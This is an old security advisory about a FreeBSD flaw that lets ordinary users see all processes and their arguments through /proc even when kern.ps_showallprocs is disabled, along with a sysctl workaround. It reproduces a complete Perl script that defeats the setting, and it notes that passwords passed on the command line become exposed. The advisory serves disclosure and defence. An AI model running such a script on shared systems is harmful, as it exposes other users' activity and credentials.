COMMAND

	ps information leak in FreeBSD

SYSTEMS AFFECTED

	All FreeBSD ?

PROBLEM

	On a post originally by "cache", Jez Hancock comments :
	
	 > This is a little information leak. This bug(?) is not dangerous, but
	 > normal user can see all process on the box using ex. /bin/ps;
	
	This topic was addressed on freebsd-security list a  while  back,  where
	someone also noted that all user process information can be obtained  by
	regular users even  with  the  sysctl  flag  'kern.ps_showallprocs'  set
	simply by looking at the contents of /proc.  The  following  script  was
	also posted by someone to demonstrate this:
	
	#!/usr/bin/perl
	#
	# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
	# author: JohnnyB
	#
	# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
	# option; an option that hides other users process information.
	# (why would they implement such a broken and easily evaded option?)
	# [and no this didnt take any skill.  its basically an output format]
	#
	# Tested on FreeBSD 4.5-RC.
	
	print "[USER]      [GROUP]     [PID]   [FILE/ARGS]\n";
	opendir(DIR,"/proc");
	@procs=readdir(DIR);
	closedir(DIR);
	foreach ${proc} (@procs){
	 if(${proc}=~/[0-9]/o){
	  unshift(@pids, ${proc});
	 }
	}
	foreach $pid (@pids){
	 open(FD, "ls -al /proc/$pid/file|");
	 while(<FD>){
	  chomp;
	  ${l}=$_;
	  ${l}=~s/\s{1,}/ /g;
	  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
	   &ppid(${1},${2},${pid},${3});
	  }
	 }
	 close(FD);
	}
	exit(0);
	
	sub ppid(){
	 (${a},${b},${c},${d})=@_;
	 undef(${str});
	 undef(${line});
	 if(-e "/proc/$c/cmdline"){
	  open(heh,"cat /proc/$c/cmdline|");
	  @hah=<heh>;
	  @chars=split(//,@hah[0]);
	  foreach ${chr} (@chars){
	   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
	    ${str}.=" ";
	   }else{
	    ${str}.=${chr};
	   }
	  }
	  ${line}.=${a};
	  while(length(${line})<11){${line}.=" ";} #alignment...
	  ${line}.=" ".${b};
	  while(length(${line})<23){${line}.=" ";}
	  ${line}.=" ".${c};
	  while(length(${line})<31){${line}.=" ";}
	  chop(${str});
	  if(${d}eq"unknown"){
	   ${str}=~s/\s{1,}//g;
	   ${line}.=" ("."${str}".")";
	  }else{
	   ${line}.=" "."${str}";
	  }
	  @line=split(//,${line});
	  if(length(${line})>80){
	   ${cntr}=0;
	   foreach ${char} (@line){
	    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
	     print "\n"." "x32;          #^Anything >, deal with the rollover.
	    }
	    print "${char}";
	    ${cntr}++;
	   }
	   print "\n";
	  }
	  else{
	   print "${line}\n";
	  }
	  return(0);
	 }
	}
	
	I believe someone (last poster in this thread?) also posted a  patch  on
	the same list, freebsd-security.
	
	It's annoying in that I see a lot of users running  mysql  with  the  -u
	and -p options:
	
	mysql -u user -p mypassword
	
	on the commandline, thinking that this info  will  not  show  up  in  ps
	listings when ps is run by other users.  Ho hum...

SOLUTION

	 Workaround   Update (09 January 2003)
	 ==========
	
	Sean Kelly [smkelly@zombie.org] [http://www.zombie.org] says :
	
	FreeBSD also has a sysctl knob which will protect against this.
	
	(2) root:~$ sysctl kern.ps_argsopen=3D0
	kern.ps_argsopen: 1 -> 0
	
	This will prevent exactly the problem you describe, by making  arguments
	not viewable to other users (excluding root). IT also  appears  to  take
	effect in /proc, such as /proc/<pid>/cmdline.
	
	This is present in FreeBSD 4.7-STABLE, at least.